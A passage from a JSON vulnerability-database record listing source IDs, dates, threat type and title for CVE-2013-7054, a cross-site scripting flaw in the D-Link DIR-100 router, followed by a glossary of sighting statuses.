"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"date": "2024-11-21T02:00:14.943000",
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-100\u00a0 Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.